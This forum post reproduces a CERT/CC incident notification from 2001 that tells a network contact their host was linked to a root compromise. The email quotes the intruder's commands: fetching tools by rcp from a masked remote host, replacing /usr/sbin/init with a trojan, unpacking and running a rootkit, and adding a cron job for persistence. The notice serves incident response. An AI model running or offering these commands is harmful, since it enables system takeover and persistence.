|
Hi all,
The first time I was hacked I got the
following email:
Hello,
My name is Ian Finlay. I am a member of the technical staff at the CERT Coordination Center. The CERT/CC provides technical assistance to Internet sites in response to computer security incidents. For more information about the CERT/CC, please see http://www.cert.org/ We are contacting you as a WHOIS registered point of contact for resources that were involved in a security incident being handled by the CERT/CC. If there is a more appropriate point of contact for security incidents, please forward this message. The CERT/CC received a report on 02/20/01 from a site with a root compromised system. An intruder appeared to have been using the system as a file repository for intruder tools. The reporter indicated to us that at some point in time, they believe the following host(s) in your network contacted this compromised host to obtain intruder tools: 209.88.xxx.xxx (Here my IP) The reporter claimed that once the intruder tools had been obtained, the intruder executed the following commands on the compromised machine: cd / ; rcp 62050w01 XXX XXX XXX XXX:net4.gz /usr/sbin/init.gz ; rm -rf /usr/sbin/init ; gzip -d /usr/sbin/init.gz ; chmod +x /usr/sbin/init /usr/sbin/init cd /tmp ; rcp 62050w01 XXX XXX XXX XXX:erkms.tgz . ; tar zxvf erkms.tgz ; cd erk ; ./go ; rm -rf /var/named/a echo "*/5 * * * * /usr/sbin/init" >/cr0n killall -9 inetd /usr/sbin/inetd /usr/bin/crontab /cr0n >>/dev/null rm -rf /cr0n >>/dev/null killall -9 named >>/dev/null /usr/sbin/named & >>/dev/null We encourage you to check for signs of intruder activity on the host(s) listed above. We have assigned an internal reference number to this notification and it is included in the subject line of this message. Please include the reference number in the subject line of future correspondence about this notification. Regards, Ian Ian Finlay Internet Security Analyst - CERT/CC Operations =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= CERT (R) Coordination Center Email: cert cert org Software Engineering Institute WWW: http://www.cert.org Carnegie Mellon University Hotline: +1-412-268-7090 Pittsburgh, PA USA 15213-3890 FAX: +1-412-268-6989 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOpbL8gYcfu8gsZJZAQHVnAQAhxU41BiNUv6h26c8Z++Na89LSTU4fnEL Rn+RgaLPbskY0Tz5m/Dn/A0UYhP5Nur+N46bjzofmFtUfzBRiHjGZwOZ2pDdUcET EeB0mlljf7qvWdretDc1Rx4boPwuTficHQdh7xAvetkNAbgEXEYXoZ7NHfyk6C1T Dorg/l9LDk4= =dVLN -----END PGP SIGNATURE----- |